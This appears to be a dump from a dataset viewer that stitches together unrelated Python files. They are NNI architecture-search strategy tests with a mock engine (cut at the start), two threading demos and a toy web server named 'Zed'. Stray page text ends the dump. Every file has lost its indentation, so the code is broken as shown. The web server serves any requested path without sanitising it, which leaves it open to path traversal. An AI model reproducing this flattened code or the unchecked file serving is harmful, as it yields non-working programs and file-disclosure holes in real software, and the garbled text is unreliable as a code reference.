def _model_complete(self, model: Model):
time.sleep(random.uniform(0, 1))
if random.uniform(0, 1) < self.failure_prob:
model.status = ModelStatus.Failed
else:
model.metric = random.uniform(0, 1)
model.status = ModelStatus.Trained
self._resource_left += 1
def submit_models(self, *models: Model) -> None:
for model in models:
self.models.append(model)
self._resource_left -= 1
threading.Thread(target=self._model_complete, args=(model, )).start()
def list_models(self) -> List[Model]:
return self.models
def query_available_resource(self) -> Union[List[WorkerInfo], int]:
return self._resource_left
def budget_exhausted(self) -> bool:
pass
def register_graph_listener(self, listener: AbstractGraphListener) -> None:
pass
def trial_execute_graph(cls) -> MetricData:
pass
def _reset_execution_engine(engine=None):
nni.retiarii.execution.api._execution_engine = engine
class Net(nn.Module):
def __init__(self, hidden_size=32, diff_size=False):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 20, 5, 1)
self.conv2 = nn.Conv2d(20, 50, 5, 1)
self.fc1 = nn.LayerChoice([
nn.Linear(4*4*50, hidden_size, bias=True),
nn.Linear(4*4*50, hidden_size, bias=False)
], label='fc1')
self.fc2 = nn.LayerChoice([
nn.Linear(hidden_size, 10, bias=False),
nn.Linear(hidden_size, 10, bias=True)
] + ([] if not diff_size else [nn.Linear(hidden_size, 10, bias=False)]), label='fc2')
def forward(self, x):
x = F.relu(self.conv1(x))
x = F.max_pool2d(x, 2, 2)
x = F.relu(self.conv2(x))
x = F.max_pool2d(x, 2, 2)
x = x.view(-1, 4*4*50)
x = F.relu(self.fc1(x))
x = self.fc2(x)
return F.log_softmax(x, dim=1)
def _get_model_and_mutators(**kwargs):
base_model = Net(**kwargs)
script_module = torch.jit.script(base_model)
base_model_ir = convert_to_graph(script_module, base_model)
base_model_ir.evaluator = DebugEvaluator()
mutators = process_inline_mutation(base_model_ir)
return base_model_ir, mutators
def test_grid_search():
gridsearch = strategy.GridSearch()
engine = MockExecutionEngine()
_reset_execution_engine(engine)
gridsearch.run(*_get_model_and_mutators())
wait_models(*engine.models)
selection = set()
for model in engine.models:
selection.add((
model.graphs['_model__fc1'].hidden_nodes[0].operation.parameters['bias'],
model.graphs['_model__fc2'].hidden_nodes[0].operation.parameters['bias']
))
assert len(selection) == 4
_reset_execution_engine()
def test_random_search():
random = strategy.Random()
engine = MockExecutionEngine()
_reset_execution_engine(engine)
random.run(*_get_model_and_mutators())
wait_models(*engine.models)
selection = set()
for model in engine.models:
selection.add((
model.graphs['_model__fc1'].hidden_nodes[0].operation.parameters['bias'],
model.graphs['_model__fc2'].hidden_nodes[0].operation.parameters['bias']
))
assert len(selection) == 4
_reset_execution_engine()
def test_evolution():
evolution = strategy.RegularizedEvolution(population_size=5, sample_size=3, cycles=10, mutation_prob=0.5, on_failure='ignore')
engine = MockExecutionEngine(failure_prob=0.2)
_reset_execution_engine(engine)
evolution.run(*_get_model_and_mutators())
wait_models(*engine.models)
_reset_execution_engine()
evolution = strategy.RegularizedEvolution(population_size=5, sample_size=3, cycles=10, mutation_prob=0.5, on_failure='worst')
engine = MockExecutionEngine(failure_prob=0.4)
_reset_execution_engine(engine)
evolution.run(*_get_model_and_mutators())
wait_models(*engine.models)
_reset_execution_engine()
@pytest.mark.skipif(sys.platform in ('win32', 'darwin'), reason='Does not run on Windows and MacOS')
def test_rl():
rl = strategy.PolicyBasedRL(max_collect=2, trial_per_collect=10)
engine = MockExecutionEngine(failure_prob=0.2)
_reset_execution_engine(engine)
rl.run(*_get_model_and_mutators(diff_size=True))
wait_models(*engine.models)
_reset_execution_engine()
rl = strategy.PolicyBasedRL(max_collect=2, trial_per_collect=10, asynchronous=False)
engine = MockExecutionEngine(failure_prob=0.2)
_reset_execution_engine(engine)
rl.run(*_get_model_and_mutators())
wait_models(*engine.models)
_reset_execution_engine()
if __name__ == '__main__':
test_grid_search()
test_random_search()
test_evolution()
test_rl()
|
hilo2.py | import threading
def worker(count):
print ('Este es el %s trabajo que hago hoy' % count)
return
threads = list()
for i in range(3):
t = threading.Thread(target=worker, args=(i,))
threads.append(t)
t.start() |
testweb.py | '''
Zed webserver
Very basic model of working Webserver
@name Zed
@author ZaKlaus
@version 1.0
@imports socket,re,os
@license MIT
'''
import socket as bs
import re
import os.path
import os
from threading import Thread
class Network:
def __init__(self, host, port, conn):
self.host = host
self.port = port
self.conn = conn
def Listen(self):
Network.sock = bs.socket()
Network.sock.bind((self.host, self.port))
Network.sock.listen(self.conn)
def Receive(self, client, size):
try:
return client.recv(size)
except ConnectionResetError:
self.Listen()
def Send(self, client, buf):
try:
client.send(buf)
except ConnectionResetError:
self.Listen()
def Accept(self):
try:
return self.sock.accept()
except:
self.Listen()
return None
def Close(self):
Network.sock.close()
class System:
def __init__(self, pagedir, slash, network):
self.basedir = os.getcwd() + slash
self.pagedir = self.basedir + pagedir + slash
self.network = Network(network[0], network[1], network[2])
self.mimemap = []
print ("Zed Webserver -- 0.0.1")
print ("Building MIME map...")
mimelist = open(self.basedir + "mime.txt", 'r', encoding="utf-8").read()
for x in mimelist.splitlines():
try:
self.mimemap.append([x.split(" ")[0][1:], x.split(" ")[1]])
except IndexError:
pass
print ("MIME map's been built!")
self.network.Listen()
print ("Server is listening at %s:%d" %(self.network.host, self.network.port))
def SetDomain(self, domain):
self.domain = domain
def GetDomain(self):
return self.domain
def LoadFile(self, filename):
print('File request: ', self.pagedir + filename)
try:
f = open(self.pagedir + filename,'r', encoding="utf-8")
out = f.read()
self.binarystate = False
except:
f = open(self.pagedir + filename,'rb')
out = f.read()
self.binarystate = True
f.close()
return out
def GetMIME(self, ext):
ext = ext
for x in range(len(self.mimemap)):
if self.mimemap[x][0] == ext:
return self.mimemap[x][1]
return "null"
def Tick_safe(self, client, address):
print ("Incoming connection: ", address)
request = Request(self, self.network.Receive(client, 1024))
self.network.Send(client, request.send)
self.network.Close()
def Tick(self):
try:
client, address = self.network.Accept()
except:
return
thread = Thread(target=self.Tick_safe, args=(client, address))
thread.start()
class Request:
def __init__(self, system, data):
self.system = system
self.Proceed(data)
def BuildList(self):
data = os.listdir(self.system.pagedir)
text = "<html><head><title>Files</title></head><body>Files:\n"
for a in data:
text += '<li><a href="http://'+self.domain+str(self.system.network.port)+'/'+a+'">'+a+'</a>' + '</li>'
text += "</body></html>"
return text
def GenerateResponse(self, params):
return "HTTP/1.1 200 OK\nServer: Zed Webserver\n%sConnection: keep-alive\nContent-Type: %s\n\n" % (params[0], params[1]);
def Identify(self, var, op):
if op == 's':
print ("Content-Length: %d" % len(var))
return "Content-Length: %d\n" % len(var)
elif op == 't':
try:
mime = self.system.GetMIME(var)
if mime == "null":
raise ValueError
print ("Content-Type: %s" % mime)
return mime
except ValueError:
print ("Unknown MIME type! Extension: %s" % var)
return "text/html"
def Proceed(self, data):
try:
try:
self.domain = re.search('Host: (\S+):',data.decode(),re.DOTALL).group(0)[6:]
except:
try:
self.domain = re.search('Host: (\S+)\r\nD',data.decode(),re.DOTALL).group(0)[6:-5]
except:
self.system.network.Listen()
return
self.get = re.search('/(\S+\.\S+)\s',data.decode(),re.DOTALL).group(0)
print ("GET '%s' FROM '%s'" % (self.get, self.domain))
if self.get.startswith("/1.1"):
raise ValueError
except:
print('No URL specified! Assuming index.html')
if not os.path.isfile(self.system.pagedir + 'index.html'):
print('index.html not found! Generating file tree...')
self.data = self.BuildList()
self.response = self.GenerateResponse(("", "text/html"))
self.send = ("%s%s" % (self.response, self.data)).encode()
return
else:
self.data = self.system.LoadFile('index.html')
self.response = self.GenerateResponse(("", "text/html"))
self.send = ("%s%s" % (self.response, self.data)).encode()
return
if not os.path.isfile(self.system.pagedir + self.get):
self.data = self.system.LoadFile('404.html')
self.response = self.GenerateResponse(("", "text/html"))
self.send = ("%s%s" % (self.response, self.data)).encode()
return
else:
self.data = self.system.LoadFile(self.get)
self.extension = self.get.split(".")[1][:-1]
if self.system.binarystate:
self.response = ""
self.send = self.data
else:
self.response = self.GenerateResponse((self.Identify(self.data, 's'), self.Identify(self.extension, 't')))
self.send = ("%s%s" % (self.response, self.data)).encode()
main = System("page", '\\', ("", 7777, 128))
while True:
main.Tick()
|
joining.py | import time
from threading import Thread
def print_and_sleep(number):
for i in range(number):
time.sleep(1)
print(i)
# Note that args argument must be used for parallelism
thread_1 = Thread(target=print_and_sleep, args=(10,))
thread_2 = Thread(target=print_and_sleep, args=(10,))
# By using join, we force one thread to finish before another starts
start = time.time()
thread_1.start()
thread_1.join()
thread_2.start()
thread_2.join()
end = time.time()
# Takes 20 seconds
print(end - start)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.